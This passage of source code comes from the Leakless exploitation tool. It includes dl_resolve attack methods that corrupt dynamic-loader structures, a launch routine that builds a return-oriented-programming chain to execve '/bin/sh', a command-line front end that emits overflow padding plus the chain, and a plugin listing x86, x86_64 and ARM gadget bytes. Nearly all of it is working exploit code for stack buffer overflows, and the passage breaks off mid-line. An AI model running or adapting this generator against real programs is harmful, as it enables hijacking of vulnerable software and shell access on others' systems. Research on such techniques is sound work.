buffer.allocate(self.structs.Elf_Dyn.sizeof(), name="dt_strtab_entry") 436 | 437 | exploit = self.empty_exploit() 438 | 439 | # TODO: here is not really necessary to write DT_STRTAB, no one will check that 440 | dt_strtab_entry = self.structs.Elf_Dyn.parse("\x00" * self.structs.Elf_Dyn.sizeof()) 441 | dt_strtab_entry.d_tag = "DT_STRTAB" 442 | dt_strtab_entry.d_val = fake_dynstr_area.start 443 | exploit += self.write_string(dt_strtab_entry_area, self.structs.Elf_Dyn.build(dt_strtab_entry)) 444 | 445 | if not self.full_relro: 446 | # OK, the l_pointer is just a GOT[1] and dl_resolve is in GOT[2] 447 | l_pointer = self.gotplt + self.pointer_size * 1 448 | dl_resolve_pointer = self.gotplt + self.pointer_size * 2 449 | 450 | # We can also use the plt[0] entry 451 | plt0 = self.plt 452 | reloc_index = self.min_reloc_index * self.rel_struct.sizeof() 453 | else: 454 | # We can't use GOT[1], GOT[2] or plt[0], let's work around this 455 | 456 | # We reuse a part of the buffer multiple times 457 | exe_link_map_area = buffer.allocate(self.pointer_size, name="exe_link_map") 458 | first_lib_link_map_area = buffer.allocate(self.pointer_size, name="first_lib_link_map") 459 | dyn_gotplt_area = first_lib_link_map_area # Reuse 460 | gotplt_area = dyn_gotplt_area # Reuse 461 | dl_resolve_area = gotplt_area # Reuse 462 | 463 | # Prepare fake relocation 464 | prepare_relocation, fake_relocation_area = self.create_relocation(buffer, self.min_symbol_index) 465 | exploit += prepare_relocation 466 | 467 | # TODO: factorize this 468 | dt_jmprel_entry_area = buffer.allocate(self.structs.Elf_Dyn.sizeof(), name="fake_jmprel_entry") 469 | # TODO: here is not really necessary to write DT_JMPREL, no one will check that 470 | dt_jmprel_entry = self.structs.Elf_Dyn.parse("\x00" * self.structs.Elf_Dyn.sizeof()) 471 | dt_jmprel_entry.d_tag = "DT_JMPREL" 472 | dt_jmprel_entry.d_val = fake_relocation_area.start 473 | exploit += self.write_string(dt_jmprel_entry_area, self.structs.Elf_Dyn.build(dt_jmprel_entry)) 474 | 475 | # Let's navigate a bit through data structures 476 | 477 | # exe_link_map = *(*DT_DEBUG.d_val + offsetof(r_map)) 478 | # TODO: factorize out glibc's magic numbers 479 | r_map_offset = self.pointer_size # an int 480 | exploit += self.deref_with_offset_and_save(self.ptr2str(self.dt_debug), 481 | self.ptr2str(r_map_offset), 482 | self.ptr2str(exe_link_map_area.start)) 483 | 484 | # first_lib_link_map = *(*exe_link_map + offsetof(l_next)) 485 | l_next_offset = self.pointer_size * 3 # skip l_addr, l_name and l_ld 486 | exploit += self.deref_with_offset_and_save(self.ptr2str(exe_link_map_area.start), 487 | self.ptr2str(l_next_offset), 488 | self.ptr2str(first_lib_link_map_area.start)) 489 | 490 | # Repeat until we reach the desired library (check with `ldd`) 491 | for _ in xrange(1, self.library_index + 1): 492 | exploit += self.deref_with_offset_and_save(self.ptr2str(first_lib_link_map_area.start), 493 | self.ptr2str(l_next_offset), 494 | self.ptr2str(first_lib_link_map_area.start)) 495 | 496 | # dyn_gotplt = *(*first_lib_link_map + offsetof(l_info) + offsetof(DT_PLTGOT)) 497 | dt_pltgot_offset = ENUM_D_TAG["DT_PLTGOT"] * self.pointer_size 498 | exploit += self.deref_with_offset_and_save(self.ptr2str(first_lib_link_map_area.start), 499 | self.ptr2str(l_info_offset + dt_pltgot_offset), 500 | self.ptr2str(dyn_gotplt_area.start)) 501 | 502 | # gotplt = *(*dyn_gotplt + offsetof(d_val)) 503 | d_val_offset = self.pointer_size 504 | exploit += self.deref_with_offset_and_save(self.ptr2str(dyn_gotplt_area.start), 505 | 
self.ptr2str(d_val_offset), 506 | self.ptr2str(gotplt_area.start)) 507 | 508 | # dl_resolve = *(*gotplt + offsetof(dl_resolve_offset)) 509 | dl_resolve_offset = self.pointer_size * 2 # Take GOT[2] 510 | exploit += self.deref_with_offset_and_save(self.ptr2str(gotplt_area.start), 511 | self.ptr2str(dl_resolve_offset), 512 | self.ptr2str(dl_resolve_area.start)) 513 | 514 | # Make DT_JMPREL of the main executable point to our fake relocation 515 | # *(*exe_link_map + offsetof(l_info) + offsetof(DT_REL)) = fake_relocation 516 | dt_rel_offset = ENUM_D_TAG["DT_JMPREL"] * self.pointer_size 517 | exploit += self.write_with_offset(self.ptr2str(exe_link_map_area.start), 518 | self.ptr2str(l_info_offset + dt_rel_offset), 519 | self.ptr2str(dt_jmprel_entry_area.start)) 520 | 521 | l_pointer = exe_link_map_area.start 522 | dl_resolve_pointer = dl_resolve_area.start 523 | plt0 = None 524 | reloc_index = 0 525 | 526 | # Make DT_STRTAB point to our fake DT_STRTAB structure 527 | # *(*l_pointer + offsetof(l_info) + offsetof(DT_STRTAB)) = dt_strtab_entry 528 | exploit += self.write_with_offset(self.ptr2str(l_pointer), 529 | self.ptr2str(l_info_offset + dt_strtab_offset), 530 | self.ptr2str(dt_strtab_entry_area.start)) 531 | 532 | return ExploitInfo(prepare=exploit, 533 | reloc_index=reloc_index, 534 | l_struct=l_pointer, 535 | dl_resolve=dl_resolve_pointer, 536 | plt0=plt0, 537 | function_name_area=function_name_area) 538 | 539 | def launch(exploit, program): 540 | """Launch an execve("/bin/sh/", &null, &null); exploit.""" 541 | 542 | buffer = Buffer(exploit, exploit.writeable_ranges) 543 | 544 | binsh_str = program + "\0" 545 | 546 | pointer_to_null = buffer.allocate(exploit.pointer_size, name="pointer_to_null") 547 | binsh = buffer.allocate(len(binsh_str), name="binsh") 548 | 549 | result = "" 550 | 551 | result += exploit.allocate_helpers(buffer) 552 | 553 | # Pointer to NULL 554 | result += exploit.write_pointer(pointer_to_null, 0) 555 | 556 | # /bin/sh 557 | result += exploit.write_string(binsh, binsh_str) 558 | 559 | # TODO: fixme 560 | exploit_info = exploit.jump_to(buffer, len("execve\0")) 561 | 562 | result += exploit.write_string(exploit_info.function_name_area, "execve\0") 563 | 564 | result += exploit_info.prepare 565 | 566 | result = exploit.flush(buffer) + result 567 | 568 | result += invoke(exploit, exploit_info, [binsh.pointer, pointer_to_null.pointer, pointer_to_null.pointer]) 569 | 570 | log(buffer.dump()) 571 | 572 | return result 573 | 574 | def invoke(exploit, exploit_info, parameters): 575 | result = "" 576 | 577 | if exploit_info.plt0 is not None: 578 | # Invocation of the dynamic linker resolver (plt[0]) with the 579 | # appropriate relocation index 580 | launch = exploit.ptr2str(exploit_info.plt0) + exploit.ptr2str(exploit_info.reloc_index) 581 | 582 | prepare, nope, stack_frame = exploit.call(launch, parameters) 583 | result += prepare + stack_frame 584 | 585 | elif (exploit_info.dl_resolve is not None) and \ 586 | (exploit_info.l_struct is not None): 587 | 588 | # TODO: this is outdated 589 | # Layout: 590 | # ©_to_stack 591 | # offset = C - A 592 | # destination 593 | # A: ©_to_stack 594 | # offset = B - B 595 | # destination 596 | # B: &dl_resolve 597 | # C: &l 598 | # reloc_index 599 | 600 | function_call, next_gadget_offset, stack_frame = exploit.call(exploit.filler, parameters) 601 | 602 | copy_dl_resolve = exploit.copy_to_stack(exploit.ptr2str(exploit_info.dl_resolve), 603 | exploit.ptr2str(next_gadget_offset + 0 * exploit.pointer_size)) 604 | 605 | result += 
exploit.copy_to_stack(exploit.ptr2str(exploit_info.l_struct), 606 | exploit.ptr2str(len(copy_dl_resolve) + len(function_call))) + \ 607 | copy_dl_resolve + \ 608 | function_call + \ 609 | exploit.filler + \ 610 | exploit.ptr2str(exploit_info.reloc_index) + \ 611 | stack_frame 612 | else: 613 | raise Exception("Don't know how to launch the exploit") 614 | 615 | return result 616 | 617 | exploit_method = { 618 | "ld-corrupt": CorruptLdSoExploit, 619 | "craft-dl-structs": CraftDlStructsExploit 620 | } 621 | 622 | def main(): 623 | # Handle arguments 624 | parser = argparse.ArgumentParser(description='Leakless') 625 | parser.add_argument('executable', metavar='EXECUTABLE', help='Path to the executable to exploit.', nargs=1) 626 | parser.add_argument("-o", '--output', metavar="TYPE", default="rop-chain", help='"rop-chain" will generate a ROP chain to exploit a stack based buffer overflow. "json" will output information about what needs to be written and where, along with the address of _dl_resolve_address and the index to pass it. Default is "rop-chain".') 627 | parser.add_argument("-m", "--method", metavar="METHOD", default="craft-dl-structs", help='"craft-dl-structs" will try to create all the structures necessary to invoke the dynamic loader in a writable memory address.\n"ld-corrupt" changes the pointer to DT_STRTAB ElfN_Dyn entry in an internal data structure of the loader and fakes a .dynstr table. Default is "craft-dl-structs".') 628 | parser.add_argument("-v", '--verbose', action='store_true', help="Print debug information.") 629 | parser.add_argument("-f", '--offset', metavar='OFFSET', type=int, help='Offset to overwrite the saved PC.') 630 | parser.add_argument("-l", '--library', metavar='LIBRARY', type=int, default=0, help='When using the "ld-corrupt" method, use the LIBRARY-th dependency to obtain the dl_resolve pointer. Use `ldd` to get the order of the libraries. By default is 0.') 631 | parser.add_argument("-s", '--size', action="store_true", help="Don't output the acutal ROP chain, but just its size.") 632 | args = parser.parse_args() 633 | 634 | executable_path = args.executable[0] 635 | 636 | utils.verbose = args.verbose 637 | 638 | # TODO: implement "gdb" output method 639 | if args.output in ["json", "ropl"]: 640 | route = "dump" 641 | else: 642 | route = args.output 643 | 644 | # Handle registered modules 645 | gadget_providers = {} 646 | modules = glob.glob(os.path.dirname(__file__) + "/plugins/*.py") 647 | modules = [os.path.splitext(os.path.basename(module))[0] for module in modules] 648 | modules.remove("__init__") 649 | 650 | for module_name in modules: 651 | module = importlib.import_module("plugins." 
+ module_name) 652 | for key, value in module.register_gadget_provider(): 653 | gadget_providers[key] = value 654 | 655 | # Instantiate inline a class with the appropriate subclasses 656 | exploit = (type("", (gadget_providers[route], exploit_method[args.method], object), {}))() 657 | exploit.config_from_elf(executable_path) 658 | exploit.library_index = args.library 659 | 660 | if args.output == "json": 661 | # TODO: move in an external function 662 | buffer = Buffer(exploit, exploit.writeable_ranges) 663 | exploit_info = exploit.jump_to(buffer, len("execve\0")) 664 | result = exploit.empty_exploit() 665 | result += exploit.write_string(exploit_info.function_name_area, "execve\0") 666 | 667 | result += exploit_info.prepare 668 | 669 | result = exploit.flush(buffer) + result 670 | 671 | what_to_write = [] 672 | 673 | for gadget_type, value, address, offset in result: 674 | if gadget_type == "write_constant": 675 | address = hex(exploit.str2ptr(address)) 676 | elif gadget_type == "write_with_offset": 677 | address = {"deref": hex(exploit.str2ptr(address)), "offset": hex(exploit.str2ptr(offset))} 678 | elif gadget_type == "deref_with_offset_and_save": 679 | address = {"deref": hex(exploit.str2ptr(address)), "offset": hex(exploit.str2ptr(offset))} 680 | what_to_write.append({"address": hex(exploit.str2ptr(value)), "value": address}) 681 | continue 682 | 683 | what_to_write.append({"address": address, "value": value.encode("hex")}) 684 | 685 | result = {"write": what_to_write, "reloc_index": exploit_info.reloc_index} 686 | 687 | if exploit_info.plt0 is not None: 688 | result["plt0"] = hex(exploit_info.plt0) 689 | else: 690 | result["l_struct"] = hex(exploit_info.l_struct) 691 | result["dl_resolve"] = hex(exploit_info.dl_resolve) 692 | 693 | sys.stdout.write(json.dumps(result, indent=4, sort_keys=True) + "\n") 694 | return 695 | elif args.output == "ropl": 696 | # TODO: move in an external function 697 | buffer = Buffer(exploit, exploit.writeable_ranges) 698 | exploit_info = exploit.jump_to(buffer, len("execve\0")) 699 | result = exploit.empty_exploit() 700 | result += exploit.write_string(exploit_info.function_name_area, "execve\0", buffered=False) 701 | 702 | result += exploit_info.prepare 703 | 704 | result = exploit.flush(buffer) + result 705 | 706 | sys.stdout.write("fun main() {\n") 707 | emit = lambda x: sys.stdout.write(" " + x + "\n") 708 | 709 | for gadget_type, value, address, offset in result: 710 | if gadget_type == "write_constant": 711 | address = exploit.str2ptr(address) 712 | remaining = len(value) % exploit.pointer_size 713 | 714 | if remaining != 0: 715 | value += "\x00" * (exploit.pointer_size - remaining) 716 | 717 | for word, address in izip(chunks(value, exploit.pointer_size), xrange(address, address + len(value) / 4, 4)): 718 | emit("v = {}".format(hex(address))) 719 | emit("[v] = {}".format(hex(exploit.str2ptr(word)))) 720 | 721 | elif gadget_type == "write_with_offset": 722 | address = hex(exploit.str2ptr(address)) 723 | offset = hex(exploit.str2ptr(offset)) 724 | value = hex(exploit.str2ptr(value)) 725 | 726 | emit("address = {}".format(address)) 727 | emit("target = [address] + {}".format(offset)) 728 | emit("[target] = {}".format(value)) 729 | 730 | elif gadget_type == "deref_with_offset_and_save": 731 | save_address, pointer_address, offset = hex(exploit.str2ptr(value)), hex(exploit.str2ptr(address)), hex(exploit.str2ptr(offset)) 732 | emit("target = {}".format(save_address)) 733 | emit("source = {}".format(pointer_address)) 734 | emit("value = [source] + 
{}".format(offset)) 735 | emit("[target] = [value]".format(save_address)) 736 | emit("") 737 | 738 | sys.stdout.write("}\n") 739 | return 740 | else: 741 | if args.offset is None: 742 | log("Please give me the offset to reach the saved PC.") 743 | sys.exit(-1) 744 | 745 | exploit = launch(exploit, "/bin/sh") 746 | if args.size: 747 | sys.stdout.write(str(len(exploit)) + "\n") 748 | else: 749 | sys.stdout.write("A" * args.offset + exploit) 750 | 751 | if __name__ == "__main__": 752 | main() 753 | -------------------------------------------------------------------------------- /memory.py: -------------------------------------------------------------------------------- 1 | from rangeset import RangeSet 2 | 3 | from utils import align, chunks, log 4 | 5 | class AllocateFailException(Exception): 6 | pass 7 | 8 | class Buffer: 9 | """Create a Buffer from the specified ranges. 10 | Please provide disjoint ranges.""" 11 | def __init__(self, exploit, ranges): 12 | self.exploit = exploit 13 | self.areas = {} 14 | self.ranges = ranges 15 | self.cleanup_ranges() 16 | 17 | # TODO: keep track of spaoce left empty and try to reuse it 18 | # TODO: add an upper boundary 19 | def allocate(self, size, align_to=None, alignment=None, name=None, constraint=lambda x,y: True, start=None): 20 | if start is not None: 21 | result = MemoryArea(self.exploit, start, size, align_to, alignment) 22 | if (result.start, result.end) not in self.ranges: 23 | raise Exception("The range (" + hex(result.start) + ", " + hex(result.end) + ") is not allowed") 24 | else: 25 | for candidate_range in self.ranges: 26 | start, end = candidate_range 27 | 28 | result = MemoryArea(self.exploit, start, size, align_to, alignment) 29 | start += result.size 30 | 31 | while (start < end) and (not constraint(result.start, result.index)): 32 | result = MemoryArea(self.exploit, start, size, align_to, alignment) 33 | start += result.size 34 | 35 | if start < end: 36 | break 37 | else: 38 | result = None 39 | 40 | if result is None: 41 | raise AllocateFailException("Couldn't find a position for memory area \"" + str(name) + "\" satisfying the imposed constraints before the end of the available buffer.") 42 | else: 43 | # We have to create a hole in the appropriate range 44 | self.ranges = self.ranges - RangeSet(result.start, result.end) 45 | self.cleanup_ranges() 46 | 47 | if name is not None: 48 | self.areas[name] = result 49 | 50 | return result 51 | 52 | def cleanup_ranges(self): 53 | self.ranges = RangeSet.mutual_union(*filter(lambda (start, end): start != end, list(self.ranges))) 54 | 55 | def dump(self): 56 | result = "" 57 | for k, v in self.areas.iteritems(): 58 | result += "Area " + k + "\n" + "\n".join([" " * 4 + line for line in v.dump().split("\n")]) + "\n" 59 | return result 60 | 61 | class MemoryArea: 62 | def __init__(self, exploit, start, size, align_to=None, alignment=None): 63 | self.exploit = exploit 64 | if align_to is not None: 65 | if start < align_to: 66 | raise Exception("Trying to align to a something which is after our buffer: aligning " + self.exploit.pointer_format % start + " to " + self.exploit.pointer_format % align_to) 67 | self.align_to = align_to 68 | self.alignment = size if (alignment is None) else alignment 69 | self.start = align(start, self.align_to, self.alignment) 70 | self.index = (self.start - self.align_to) / self.alignment 71 | else: 72 | self.alignment = 1 73 | self.align_to = 0 74 | self.start = start 75 | self.index = 0 76 | 77 | self.content = "" 78 | self.pointer = self.exploit.ptr2str(self.start) 79 
| self.size = size 80 | self.end = self.start + self.size 81 | self.wasted = -1 82 | self.is_buffered = False 83 | if self.index < 0: 84 | log("Warning: a negative index has been computed: " + str(self.index)) 85 | 86 | def dump(self): 87 | result = "" 88 | result += "Start: " + self.exploit.pointer_format % self.start + " (" + self.exploit.closest_section_from_address(self.start) + ")\n" 89 | result += "Size: " + self.exploit.pointer_format % self.size + " (" + str(self.size) + ")\n" 90 | result += "End: " + self.exploit.pointer_format % self.end + "\n" 91 | result += "Base: " + self.exploit.pointer_format % self.align_to + "\n" 92 | result += "Alignment: " + str(self.alignment) + "\n" 93 | result += "Index: " + hex(self.index) + " (" + str(self.index) + ")\n" 94 | result += "Wasted: " + str(self.wasted) + "\n" 95 | result += "Content:\n" 96 | for chunk in chunks(self.content, self.exploit.pointer_size): 97 | result += " " * 4 + " ".join(["%.2x" % ord(c) for c in chunk]) + " " + (self.exploit.pointer_format % self.exploit.str2ptr(chunk) if len(chunk) == self.exploit.pointer_size else "") + "\n" 98 | return result 99 | -------------------------------------------------------------------------------- /plugins/CommonGadgetsExploit.py: -------------------------------------------------------------------------------- 1 | from exploit import Exploit 2 | from utils import insert_and_replace 3 | 4 | class CommonGadgetsExploit(Exploit): 5 | """Mainly add a pool of gadgets common in the various architectures.""" 6 | 7 | def __init__(self): 8 | Exploit.__init__(self) 9 | 10 | # Good for FreeBSD 11 | 12 | # self.add_gadget("EM_386", "writemem", 4, 13 | # " 8b 44 24 08" + # mov eax,DWORD PTR [esp+0x8] \ 14 | # " 8b 4c 24 04" + # mov ecx,DWORD PTR [esp+0x4] \ 15 | # " 89 01" + # mov DWORD PTR [ecx],eax \ 16 | # " c3") # ret 17 | 18 | # self.add_gadget("EM_386", "cleanup", 3, 19 | # " 83 c4 0c" + # add esp,0xc \ 20 | # " c3") # ret 21 | 22 | # Good for Linux 23 | 24 | self.add_gadget("EM_386", "writemem", 4, 25 | " 8b 54 24 08" + # mov edx,DWORD PTR [esp+0x8] \ 26 | " 8b 44 24 04" + # mov eax,DWORD PTR [esp+0x4] \ 27 | " 89 10" + # mov DWORD PTR [eax],edx \ 28 | " c3") # ret 29 | 30 | # *(*(eax)+ecx) = ebx 31 | self.add_gadget("EM_386", "deref_write_with_offset", 4, 32 | " 58" + # pop eax \ 33 | " 5b" + # pop ebx \ 34 | " 59" + # pop ecx \ 35 | " 8b 00" + # mov eax,DWORD PTR [eax] \ 36 | " 89 1c 08" + # mov DWORD PTR [eax+ecx*1],ebx \ 37 | " c3") # ret 38 | 39 | self.add_gadget("EM_386", "deref_with_offset_and_save", 4, 40 | " 58" + # pop eax \ 41 | " 5b" + # pop ebx \ 42 | " 59" + # pop ecx \ 43 | " 8b 00" + # mov eax,DWORD PTR [eax] 44 | " 8b 04 18" + # mov eax,DWORD PTR [eax+ebx*1] \ 45 | " 89 01" + # mov DWORD PTR [ecx],eax \ 46 | " c3") # ret 47 | 48 | self.add_gadget("EM_386", "copy_to_stack", 4, 49 | " 5b" + # pop ebx \ 50 | " 59" + # pop ecx \ 51 | " 8b 1b" + # mov ebx,DWORD PTR [ebx] \ 52 | " 89 1c 0c" + # mov DWORD PTR [esp+ecx*1],ebx \ 53 | " c3") # ret 54 | 55 | self.add_gadget("EM_386", "cleanup", 4, 56 | " 5b" + # pop ebx \ 57 | " 5e" + # pop esi \ 58 | " 5f" + # pop edi \ 59 | " 5d" + # pop ebp \ 60 | " c3") # ret 61 | 62 | self.add_gadget("EM_386", "prepare_memcpy", 4, 63 | " 58" + # pop eax \ 64 | " 5e" + # pop esi \ 65 | " 01 e6" + # add esi,esp \ 66 | " 89 34 04" + # mov DWORD PTR [esp+eax*1],esi \ 67 | " c3") # ret 68 | 69 | self.add_gadget("EM_386", "custom_cleanup", 4, 70 | " 5b" + # pop ebx \ 71 | " 01 dc" + # add esp,ebx \ 72 | " c3") # ret 73 | 74 | # This gadget requires 6 
useless parameters 75 | 76 | self.add_gadget("EM_X86_64", "writemem", 8, 77 | " 48 8b 54 24 10" + # mov rdx,QWORD PTR [rsp+0x10] \ 78 | " 48 8b 44 24 08" + # mov rax,QWORD PTR [rsp+0x8] \ 79 | " 48 89 10" + # mov QWORD PTR [rax],rdx \ 80 | " c3") # ret 81 | 82 | self.add_gadget("EM_X86_64", "writemem", 8, 83 | " 48 89 37" + # mov QWORD PTR [rdi],rsi \ 84 | " c3") # ret 85 | 86 | self.add_gadget("EM_X86_64", "cleanup", 6, 87 | " 5b" + # pop rbx \ 88 | " 5d" + # pop rbp \ 89 | " 41 5c" + # pop r12 \ 90 | " 41 5d" + # pop r13 \ 91 | " 41 5e" + # pop r14 \ 92 | " 41 5f" + # pop r15 \ 93 | " c3") # ret 94 | 95 | self.add_gadget("EM_X86_64", "args", None, 96 | " 4c 89 ea" + # mov rdx,r13 \ 97 | " 4c 89 f6" + # mov rsi,r14 \ 98 | " 44 89 ff" + # mov edi,r15d \ 99 | " 41 ff 14 dc") # call QWORD PTR [r12+rbx*8] 100 | 101 | self.add_gadget("EM_X86_64", "deref_write_with_offset", None, 102 | " 58" + # pop rax \ 103 | " 5b" + # pop rbx \ 104 | " 59" + # pop rcx \ 105 | " 48 8b 00" + # mov rax,QWORD PTR [rax] \ 106 | " 48 89 1c 08" + # mov QWORD PTR [rax+rcx*1],rbx \ 107 | " c3") # ret 108 | 109 | self.add_gadget("EM_X86_64", "deref_with_offset_and_save", None, 110 | " 58" + # pop rax \ 111 | " 5b" + # pop rbx \ 112 | " 59" + # pop rcx \ 113 | " 48 8b 00" + # mov rax,QWORD PTR [rax] \ 114 | " 48 8b 04 18" + # mov rax,QWORD PTR [rax+rbx*1] \ 115 | " 48 89 01" + # mov QWORD PTR [rcx],rax \ 116 | " c3") # ret 117 | 118 | self.add_gadget("EM_X86_64", "copy_to_stack", None, 119 | " 5b" + # pop rbx \ 120 | " 59" + # pop rcx \ 121 | " 48 8b 1b" + # mov rbx,QWORD PTR [rbx] \ 122 | " 48 89 1c 0c" + # mov QWORD PTR [rsp+rcx*1],rbx \ 123 | " c3") # ret 124 | 125 | self.add_gadget("EM_X86_64", "prepare_memcpy", None, 126 | " 5e" + # pop rsi \ 127 | " 48 01 e6" + # add rsi,rsp \ 128 | " c3") # ret 129 | 130 | self.add_gadget("EM_X86_64", "custom_cleanup", None, 131 | " 58" + # pop rax \ 132 | " 48 01 c4" + # add rsp,rax \ 133 | " c3") # ret 134 | 135 | self.add_gadget("EM_X86_64", "prepare_easy", None, 136 | " 5f" + # pop rdi \ 137 | " 5e" + # pop rsi \ 138 | " 5a" + # pop rdx \ 139 | " c3") # ret 140 | 141 | # Assume LE 142 | 143 | self.add_gadget("EM_ARM", "writemem", 4, 144 | " 00 10 80 e5" + # str r1, [r0] \ 145 | " 1e ff 2f e1") # bx lr 146 | 147 | # Better not use this due to a bug in QEMU 148 | 149 | #self.add_gadget("EM_ARM", "prepare_regs", None, 150 | # " f8 85 bd e8") # pop {r3, r4, r5, r6, r7, r8, sl, pc} 151 | 152 | self.add_gadget("EM_ARM", "prepare_regs", None, 153 | " f8 85 bd 08") # popeq {r3, r4, r5, r6, r7, r8, sl, pc} 154 | 155 | self.add_gadget("EM_ARM", "setup_args", None, 156 | " 07 00 a0 e1" + # mov r0, r7 \ 157 | " 08 10 a0 e1" + # mov r1, r8 \ 158 | " 0a 20 a0 e1" + # mov r2, sl \ 159 | " 01 40 84 e2" + # add r4, r4, #1 \ 160 | " 33 ff 2f e1" + # blx r3 \ 161 | " 06 00 54 e1" + # cmp r4, r6 \ 162 | " f7 ff ff 1a" + # bne 8604 <__libc_csu_init+0x38> \ 163 | " f8 85 bd e8") # pop {r3, r4, r5, r6, r7, r8, sl, pc} 164 | 165 | self.add_gadget("EM_ARM", "just_ret", None, 166 | " 1e ff 2f e1") # bx lr 167 | 168 | def allocate_helpers(self, buffer): 169 | """Allocate helper buffers needed by some specific platforms (e.g. 
for cleanup 170 | purposes)""" 171 | result = Exploit.allocate_helpers(self, buffer) 172 | if self.arch == "EM_X86_64": 173 | self.popret = buffer.allocate(self.pointer_size, name="popret") 174 | nope, nope, cleanup_location = self.get_gadget("cleanup") 175 | result += self.write_pointer(self.popret, self.str2ptr(cleanup_location) + 8) 176 | return result 177 | 178 | def deref_with_offset_and_save(self, pointer_address, offset, save_address): 179 | """Dereference the address in the given memory area (pointer_address), 180 | add the offset, and copy the content to the given address 181 | (save_address).""" 182 | none, none, location = self.get_gadget("deref_with_offset_and_save") 183 | return location + pointer_address + offset + save_address 184 | 185 | def write_with_offset(self, pointer_address, offset, value): 186 | """Dereference the address in the given memory area, add the specified 187 | offset and write there the specified value.""" 188 | none, none, location = self.get_gadget("deref_write_with_offset") 189 | return location + pointer_address + value + offset 190 | 191 | def copy_to_stack(self, offset, source): 192 | """Copy the content of the given memory area (source) at the specified 193 | offset from the stack pointer. When computing the offset assume the 194 | following layout (assuming 32-bit pointers): 195 | 196 | ... 197 | &gadget -12 198 | offset -8 199 | &source -4 200 | &next_return_address 0 201 | parameter1 +4 202 | ... 203 | """ 204 | none, none, location = self.get_gadget("copy_to_stack") 205 | return location + offset + source 206 | 207 | def call(self, invocation, parameters): 208 | """ROP function invocation: return a ROP chain that sets up the arguments on the 209 | stack and/or on the registers, invoke the function and cleanup the 210 | arguments.""" 211 | if self.arch == "EM_386": 212 | return self.call32(invocation, parameters) 213 | elif self.arch == "EM_X86_64": 214 | return self.call64(invocation, parameters) 215 | elif self.arch == "EM_ARM": 216 | return self.call_arm(invocation, parameters) 217 | else: 218 | raise Exception("Unsupported architecture") 219 | 220 | def call32(self, invocation, parameters): 221 | """Implements the i386 calling convention.""" 222 | cleanup_size, nope, cleanup_location = self.get_gadget("cleanup") 223 | if len(parameters) > cleanup_size: 224 | raise Exception("Too many parameters, find a better gadget") 225 | 226 | prepare = invocation 227 | stack_frame = cleanup_location + \ 228 | "".join(map(str, parameters)) + \ 229 | self.filler * (cleanup_size - len(parameters)) 230 | return prepare, 0, stack_frame 231 | 232 | def call64(self, invocation, parameters): 233 | """Implements the x86_64 calling convention.""" 234 | if len(parameters) > 3: 235 | raise Exception("Too many parameters") 236 | elif self.str2ptr(parameters[0]) & 0xffffffff00000000 != 0: 237 | raise Exception("First parameter high part has to be 0") 238 | elif len(parameters) == 0: 239 | return invocation 240 | elif len(parameters) < 3: 241 | parameters = parameters + [self.ptr2str(0)] * (3 - len(parameters)) 242 | 243 | preapare_easy_location = self.get_gadget("prepare_easy") 244 | if preapare_easy_location is not None: 245 | preapare_easy_location = preapare_easy_location[2] 246 | prepare = preapare_easy_location + "".join(parameters) 247 | else: 248 | nope, nope, args_location = self.get_gadget("args") 249 | nope, nope, cleanup_location = self.get_gadget("cleanup") 250 | prepare = cleanup_location 251 | prepare += self.ptr2str(0) # rbx 252 | prepare += 
self.ptr2str(1) # rbp == rbx + 1 253 | prepare += self.ptr2str(self.fini + 8) # r12, jump to pop;ret 254 | prepare += parameters[2] # r13 -> rdx 255 | prepare += parameters[1] # r14 -> rsi 256 | prepare += parameters[0] # r15 -> edi 257 | prepare += args_location # move registers; call pop;ret 258 | prepare += self.filler * 7 259 | 260 | prepare += invocation 261 | 262 | return prepare, len(prepare) - len(invocation), "" 263 | 264 | def call_arm(self, invocation, parameters): 265 | """Implements the ARM calling convention.""" 266 | if len(parameters) > 3: 267 | raise Exception("Too many parameters, find a better gadget") 268 | elif len(parameters) == 0: 269 | return invocation 270 | elif len(parameters) < 3: 271 | parameters = parameters + [self.ptr2str(0)] * (3 - len(parameters)) 272 | 273 | nope, nope, prepare_regs_location = self.get_gadget("prepare_regs") 274 | nope, nope, setup_args_location = self.get_gadget("setup_args") 275 | prepare = prepare_regs_location 276 | prepare += invocation[0:4] # r3, target of a blx 277 | prepare += self.ptr2str(0) # r4 278 | prepare += self.filler # r5 279 | prepare += self.ptr2str(1) # r6 == r4 + 1 280 | prepare += parameters[0] # r7 -> r0 281 | prepare += parameters[1] # r8 -> r1 282 | prepare += parameters[2] # sl -> r2 283 | prepare += setup_args_location # pc 284 | prepare += self.filler * 7 # pop again 7 regs + pc 285 | 286 | return prepare, len(prepare_regs_location), "" 287 | 288 | def do_writemem(self, address, value): 289 | """Write a pointer-sized buffer to the specfied location. This 290 | function uses the writemem gadget.""" 291 | write_size, nope, location = self.get_gadget("writemem") 292 | 293 | remaining = "" 294 | if len(value) > write_size: 295 | remaining = value[write_size:] 296 | value = value[0:write_size] 297 | elif len(value) < write_size: 298 | value = value.ljust(write_size, "\0") 299 | 300 | # TODO: using kill for this is overkill, create a simpler gadget 301 | prepare, nope, stack_frame = self.call(location, [address, value]) 302 | return remaining, prepare + stack_frame 303 | 304 | def memcpy(self, destination, data): 305 | write_size, nope, prepare_memcpy_location = self.get_gadget("prepare_memcpy") 306 | write_size, nope, custom_cleanup_location = self.get_gadget("custom_cleanup") 307 | 308 | if len(data) % 4 != 0: 309 | data = data + "\x00" * (4 - len(data) % 4) 310 | 311 | from utils import log 312 | log("I've to write " + str(len(data)) + " bytes at " + hex(destination)) 313 | 314 | if self.arch == "EM_386": 315 | result = prepare_memcpy_location + self.ptr2str(self.pointer_size * 3) # + self.ptr2str(0) 316 | 317 | prepare, nope, stack_frame = self.call(self.ptr2str(self.memcpy_plt), [self.ptr2str(destination), self.filler, self.ptr2str(len(data))]) 318 | invocation = prepare + stack_frame 319 | invocation += custom_cleanup_location + self.ptr2str(len(data)) 320 | 321 | # Offset from ESP to position of the buffer 322 | result += self.ptr2str(len(invocation)) 323 | result += invocation 324 | 325 | result += data 326 | 327 | return result 328 | elif self.arch == "EM_X86_64": 329 | invocation = prepare_memcpy_location + self.filler + self.ptr2str(self.memcpy_plt) 330 | 331 | prepare, invocation_start, stack_frame = self.call(invocation, [self.ptr2str(destination), self.filler, self.ptr2str(len(data))]) 332 | invocation = prepare + stack_frame 333 | invocation += custom_cleanup_location + self.ptr2str(len(data)) 334 | invocation = insert_and_replace(invocation, self.ptr2str(len(invocation) - invocation_start - 
